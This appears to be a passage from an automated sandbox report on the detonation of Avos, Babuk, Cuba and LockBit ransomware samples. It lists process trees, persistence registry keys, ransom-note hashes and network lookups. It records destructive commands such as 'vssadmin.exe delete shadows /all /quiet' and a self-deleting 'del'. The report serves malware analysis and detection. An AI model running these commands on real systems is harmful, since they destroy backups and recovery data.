N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Network

N/A

Files

F:\$RECYCLE.BIN\GET_YOUR_FILES_BACK.txt

MD5	0237b63f764204e00d7242cc4d908271
SHA1	9d88e59463e2a963bea95d6a2cc5383e922f2f27
SHA256	7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857
SHA512	0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240705-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (182) files with added filename extension

ransomware

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\M:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\Q:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\J:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\Z:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\N:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\H:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\X:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\V:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\B:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\W:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\E:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\Y:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\U:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\P:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\S:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\K:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\A:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\G:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\L:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\R:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\T:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\I:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
File opened (read-only)	\??\O:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2672 wrote to memory of 2324	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 2672 wrote to memory of 2324	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 2672 wrote to memory of 2324	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 2672 wrote to memory of 2324	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 2324 wrote to memory of 2268	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2324 wrote to memory of 2268	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2324 wrote to memory of 2268	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2672 wrote to memory of 1556	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 2672 wrote to memory of 1556	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 2672 wrote to memory of 1556	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 2672 wrote to memory of 1556	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 1556 wrote to memory of 2900	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1556 wrote to memory of 2900	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1556 wrote to memory of 2900	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

C:\PerfLogs\How To Restore Your Files.txt

MD5	81fc4c91a0938482f65a72216cda1e39
SHA1	3fb3d27ceb1502ddf0d68fa9251a6aec46036377
SHA256	59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591
SHA512	ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4

Analysis: behavioral16

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

145s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

Signatures

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\cmd.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 468 wrote to memory of 5088	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 468 wrote to memory of 5088	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 468 wrote to memory of 5088	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

C:\Windows\SysWOW64\cmd.exe

/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	217.106.137.52.in-addr.arpa	udp
US	8.8.8.8:53	25.140.123.92.in-addr.arpa	udp
US	8.8.8.8:53	22.160.190.20.in-addr.arpa	udp
US	8.8.8.8:53	57.169.31.20.in-addr.arpa	udp
US	8.8.8.8:53	183.142.211.20.in-addr.arpa	udp
US	8.8.8.8:53	241.150.49.20.in-addr.arpa	udp
US	8.8.8.8:53	26.165.165.52.in-addr.arpa	udp
US	8.8.8.8:53	56.126.166.20.in-addr.arpa	udp
US	8.8.8.8:53	98.58.20.217.in-addr.arpa	udp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
US	8.8.8.8:53	26.35.223.20.in-addr.arpa	udp
US	8.8.8.8:53	11.227.111.52.in-addr.arpa	udp
US	8.8.8.8:53	168.253.116.51.in-addr.arpa	udp

Files

memory/468-0-0x00000000022B0000-0x0000000002310000-memory.dmp

memory/468-1-0x0000000000400000-0x000000000046C000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ink\ar-SA\!!FAQ for Decryption!!.txt

MD5	69acb73a5829bdddc9a7cf322178c70f
SHA1	3cd71f6cc40c90322e027712403899db2976218b
SHA256	9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5
SHA512	380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e

memory/468-372-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-1669-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-2324-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-4781-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-4788-0x0000000000400000-0x000000000046C000-memory.dmp

memory/468-7469-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-9417-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-10631-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-12089-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-12594-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-12595-0x0000000000400000-0x000000000046C000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240708-en

Max time kernel

122s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\bcdedit.exe	N/A
N/A	N/A	C:\Windows\system32\bcdedit.exe	N/A

Renames multiple (9354) files with added filename extension

ransomware

Deletes backup catalog

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\wbadmin.exe	N/A

Deletes itself

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\cmd.exe	N/A

Adds Run key to start application

persistence

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\""	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\F:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Sets desktop wallpaper using registry

ransomware

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\C4B6.tmp.bmp"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
